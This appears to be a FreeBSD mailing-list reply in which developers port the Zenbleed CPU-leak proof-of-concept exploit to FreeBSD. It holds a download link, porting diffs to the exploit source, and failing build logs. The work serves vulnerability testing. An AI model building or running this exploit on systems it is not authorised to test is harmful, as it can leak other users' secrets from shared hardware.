Re: Zenbleed
- Reply: mike tancsa : "Re: Zenbleed"
- In reply to: mike tancsa : "Re: Zenbleed"
- Go to: [ bottom of page ] [ top of archives ] [ this month ]
Date: Thu, 27 Jul 2023 20:03:42 UTC
On 23. 7. 27., mike tancsa wrote:
> On 7/27/2023 1:38 PM, Jung-uk Kim wrote:
>> I guess you checked out a wrong branch. Please see the attached
>> minimal patch I made for FreeBSD. I think it will work on any
>> supported FreeBSD branches. Note the original exploit is available
>> from here:
>>>
>>> https://lock.cmpxchg8b.com/files/zenbleed-v5.tar.gz
>>
>> With the forgotten attachment.
>>
>>
> Thanks! A little farther on RELENG_12. I can compile on RELENG_13 ok.
> With the patch do I still need to checkout Shawn's repo ? The patch
> applies cleanly if I dont switch branches
>
>
> % git clone "https://git.hardenedbsd.org/shawn.webb/zenbleed"
> Cloning into 'zenbleed'...
> warning: redirecting to
> https://git.hardenedbsd.org/shawn.webb/zenbleed.git/
> remote: Enumerating objects: 23, done.
> remote: Total 23 (delta 0), reused 0 (delta 0), pack-reused 23
> Receiving objects: 100% (23/23), 15.74 KiB | 15.74 MiB/s, done.
> Resolving deltas: 100% (8/8), done.
> % cd zenbleed/
> % git checkout origin/shawn.webb/bsd/main
> Note: switching to 'origin/shawn.webb/bsd/main'.
>
> You are in 'detached HEAD' state. You can look around, make experimental
> changes and commit them, and you can discard any commits you make in this
> state without impacting any branches by switching back to a branch.
>
> If you want to create a new branch to retain commits you create, you may
> do so (now or later) by using -c with the switch command. Example:
>
> git switch -c <new-branch-name>
>
> Or undo this operation with:
>
> git switch -
>
> Turn off this advice by setting config variable advice.detachedHead to
> false
>
> HEAD is now at 5f0b69b Import OpenBSD support patch
> % cat - > p
> --- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400
> @@ -6,13 +6,14 @@
> #include <stdbool.h>
> #include <x86intrin.h>
> #include <sched.h>
> +#ifdef __linux__
> #include <syscall.h>
> +#endif
> #include <err.h>
> #include <pthread.h>
> #include <assert.h>
> #include <ctype.h>
> #include <signal.h>
> -#include <sys/sysinfo.h>
>
> #include "zenbleed.h"
>
> @@ -82,7 +83,7 @@ void * pattern_leak_consumer(void *param)
> }
> }
>
> - fprintf(stdout, "%.*s", matchlen, matchptr);
> + fprintf(stdout, "%.*s", (int)matchlen, matchptr);
>
> // If the match is bigger than our pattern size, we skip to
> the end of it.
> if (matchlen > patlen) {
> --- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400
> @@ -46,6 +46,9 @@ bool num_inrange(char *range, int num)
> bool num_inrange(char *range, int num)
> {
> char *r, *s, *e;
> +#ifndef __linux__
> + size_t len;
> +#endif
>
> // Example:
> // 1,2,3,4-8,2
> @@ -53,7 +56,14 @@ bool num_inrange(char *range, int num)
> if (range == NULL)
> return false;
>
> - s = strtok_r(strdupa(range), ",", &r);
> +#ifndef __linux__
> + len = strlen(range) + 1;
> + s = alloca(len);
> + memcpy(s, range, len);
> +#else
> + s = strdupa(range);
> +#endif
> + s = strtok_r(s, ",", &r);
>
> while (s) {
> int start;
> --- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400
> @@ -6,13 +6,16 @@
> #include <stdbool.h>
> #include <x86intrin.h>
> #include <sched.h>
> +#ifdef __FreeBSD__
> +#include <pthread_np.h>
> +#else
> #include <syscall.h>
> +#endif
> #include <err.h>
> #include <pthread.h>
> #include <assert.h>
> #include <ctype.h>
> #include <signal.h>
> -#include <sys/sysinfo.h>
>
> #include "zenbleed.h"
>
> @@ -298,7 +301,7 @@ int main(int argc, char **argv) {
> }
>
> // We spawn a thread on every evailable core and start leaking to
> see what we get.
> - ncpus = get_nprocs();
> + ncpus = sysconf(_SC_NPROCESSORS_ONLN);
> thread_arg_t* args = calloc(sizeof(thread_arg_t), ncpus);
> threads = calloc(sizeof(pthread_t), ncpus);
>
>
> % patch -p1 < p
> Hmm... Looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400
> --------------------------
> Patching file pattern.c using Plan A...
> Hunk #1 failed at 6.
> Hunk #2 failed at 83.
> 2 out of 2 hunks failed--saving rejects to pattern.c.rej
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400
> --------------------------
> Patching file util.c using Plan A...
> Hunk #1 failed at 46.
> Hunk #2 failed at 56.
> 2 out of 2 hunks failed--saving rejects to util.c.rej
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400
> --------------------------
> Patching file zenbleed.c using Plan A...
> Hunk #1 failed at 6.
> Hunk #2 failed at 301.
> 2 out of 2 hunks failed--saving rejects to zenbleed.c.rej
> Hmm... Ignoring the trailing garbage.
> done
> % gmake
> nasm -O0 -felf64 -o zenleak.o zenleak.asm
> cc -O0 -ggdb3 -march=znver2 -DNCPUS=16 -c -o pattern.o pattern.c
> cc -O0 -ggdb3 -march=znver2 -DNCPUS=16 -c -o workqueue.o workqueue.c
> cc -O0 -ggdb3 -march=znver2 -DNCPUS=16 -c -o util.o util.c
> cc -O0 -ggdb3 -march=znver2 -DNCPUS=16 -pthread -Wl,-z,noexecstack
> zenbleed.c zenleak.o pattern.o workqueue.o util.o -o zenbleed
> zenbleed.c:141:15: warning: implicit declaration of function
> 'sched_getcpu' is invalid in C99 [-Wimplicit-function-declaration]
> int cpu = sched_getcpu();
> ^
> zenbleed.c:192:15: warning: implicit declaration of function
> 'sched_getcpu' is invalid in C99 [-Wimplicit-function-declaration]
> int cpu = sched_getcpu();
> ^
> zenbleed.c:218:5: error: unknown type name 'cpu_set_t'; did you mean
> 'cpuset_t'?
> cpu_set_t set;
> ^~~~~~~~~
> cpuset_t
> /usr/include/sys/_cpuset.h:50:24: note: 'cpuset_t' declared here
> typedef struct _cpuset cpuset_t;
> ^
> zenbleed.c:226:51: error: use of undeclared identifier 'cpu_set_t'
> if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &set) != 0)
> ^
> 2 warnings and 2 errors generated.
> gmake: *** [<builtin>: zenbleed] Error 1
> %
>
>
> It applies clean if I dont switch branches
>
> % git clone "https://git.hardenedbsd.org/shawn.webb/zenbleed"
> Cloning into 'zenbleed'...
> warning: redirecting to
> https://git.hardenedbsd.org/shawn.webb/zenbleed.git/
> remote: Enumerating objects: 23, done.
> remote: Total 23 (delta 0), reused 0 (delta 0), pack-reused 23
> Receiving objects: 100% (23/23), 15.74 KiB | 15.74 MiB/s, done.
> Resolving deltas: 100% (8/8), done.
> % cd zenbleed/
> % cat - > p
> --- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400
> @@ -6,13 +6,14 @@
> #include <stdbool.h>
> #include <x86intrin.h>
> #include <sched.h>
> +#ifdef __linux__
> #include <syscall.h>
> +#endif
> #include <err.h>
> #include <pthread.h>
> #include <assert.h>
> #include <ctype.h>
> #include <signal.h>
> -#include <sys/sysinfo.h>
>
> #include "zenbleed.h"
>
> @@ -82,7 +83,7 @@ void * pattern_leak_consumer(void *param)
> }
> }
>
> - fprintf(stdout, "%.*s", matchlen, matchptr);
> + fprintf(stdout, "%.*s", (int)matchlen, matchptr);
>
> // If the match is bigger than our pattern size, we skip to
> the end of it.
> if (matchlen > patlen) {
> --- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400
> @@ -46,6 +46,9 @@ bool num_inrange(char *range, int num)
> bool num_inrange(char *range, int num)
> {
> char *r, *s, *e;
> +#ifndef __linux__
> + size_t len;
> +#endif
>
> // Example:
> // 1,2,3,4-8,2
> @@ -53,7 +56,14 @@ bool num_inrange(char *range, int num)
> if (range == NULL)
> return false;
>
> - s = strtok_r(strdupa(range), ",", &r);
> +#ifndef __linux__
> + len = strlen(range) + 1;
> + s = alloca(len);
> + memcpy(s, range, len);
> +#else
> + s = strdupa(range);
> +#endif
> + s = strtok_r(s, ",", &r);
>
> while (s) {
> int start;
> --- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400
> +++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400
> @@ -6,13 +6,16 @@
> #include <stdbool.h>
> #include <x86intrin.h>
> #include <sched.h>
> +#ifdef __FreeBSD__
> +#include <pthread_np.h>
> +#else
> #include <syscall.h>
> +#endif
> #include <err.h>
> #include <pthread.h>
> #include <assert.h>
> #include <ctype.h>
> #include <signal.h>
> -#include <sys/sysinfo.h>
>
> #include "zenbleed.h"
>
> @@ -298,7 +301,7 @@ int main(int argc, char **argv) {
> }
>
> // We spawn a thread on every evailable core and start leaking to
> see what we get.
> - ncpus = get_nprocs();
> + ncpus = sysconf(_SC_NPROCESSORS_ONLN);
> thread_arg_t* args = calloc(sizeof(thread_arg_t), ncpus);
> threads = calloc(sizeof(pthread_t), ncpus);
>
> % patch -p1 < p
> Hmm... Looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/pattern.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/pattern.c 2023-07-27 12:26:28.324346000 -0400
> --------------------------
> Patching file pattern.c using Plan A...
> Hunk #1 succeeded at 6.
> Hunk #2 succeeded at 83.
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/util.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/util.c 2023-07-27 13:26:09.509588000 -0400
> --------------------------
> Patching file util.c using Plan A...
> Hunk #1 succeeded at 46.
> Hunk #2 succeeded at 56.
> Hmm... The next patch looks like a unified diff to me...
> The text leading up to this was:
> --------------------------
> |--- zenbleed/zenbleed.c.orig 2023-07-23 10:45:32.000000000 -0400
> |+++ zenbleed/zenbleed.c 2023-07-27 13:07:27.502780000 -0400
> --------------------------
> Patching file zenbleed.c using Plan A...
> Hunk #1 succeeded at 6.
> Hunk #2 succeeded at 301.
> done
> % gmake
> nasm -O0 -felf64 -o zenleak.o zenleak.asm
> cc -O0 -ggdb3 -march=znver2 -c -o pattern.o pattern.c
> cc -O0 -ggdb3 -march=znver2 -c -o workqueue.o workqueue.c
> cc -O0 -ggdb3 -march=znver2 -c -o util.o util.c
> cc -O0 -ggdb3 -march=znver2 -pthread -Wl,-z,noexecstack zenbleed.c
> zenleak.o pattern.o workqueue.o util.o -o zenbleed
> zenbleed.c:140:15: warning: implicit declaration of function
> 'sched_getcpu' is invalid in C99 [-Wimplicit-function-declaration]
> int cpu = sched_getcpu();
> ^
> zenbleed.c:142:5: error: unknown type name 'cpu_set_t'; did you mean
> 'cpuset_t'?
> cpu_set_t mask;
> ^~~~~~~~~
> cpuset_t
> /usr/include/sys/_cpuset.h:50:24: note: 'cpuset_t' declared here
> typedef struct _cpuset cpuset_t;
> ^
> zenbleed.c:182:15: warning: implicit declaration of function
> 'sched_getcpu' is invalid in C99 [-Wimplicit-function-declaration]
> int cpu = sched_getcpu();
> ^
> zenbleed.c:202:5: error: unknown type name 'cpu_set_t'; did you mean
> 'cpuset_t'?
> cpu_set_t set;
> ^~~~~~~~~
> cpuset_t
> /usr/include/sys/_cpuset.h:50:24: note: 'cpuset_t' declared here
> typedef struct _cpuset cpuset_t;
> ^
> zenbleed.c:210:51: error: use of undeclared identifier 'cpu_set_t'
> if (pthread_attr_setaffinity_np(&attr, sizeof(cpu_set_t), &set) != 0)
> ^
> 2 warnings and 3 errors generated.
> gmake: *** [<builtin>: zenbleed] Error 1
> %
Please try the attached patch. It should fix the sched_getcpu() issue.
Jung-uk Kim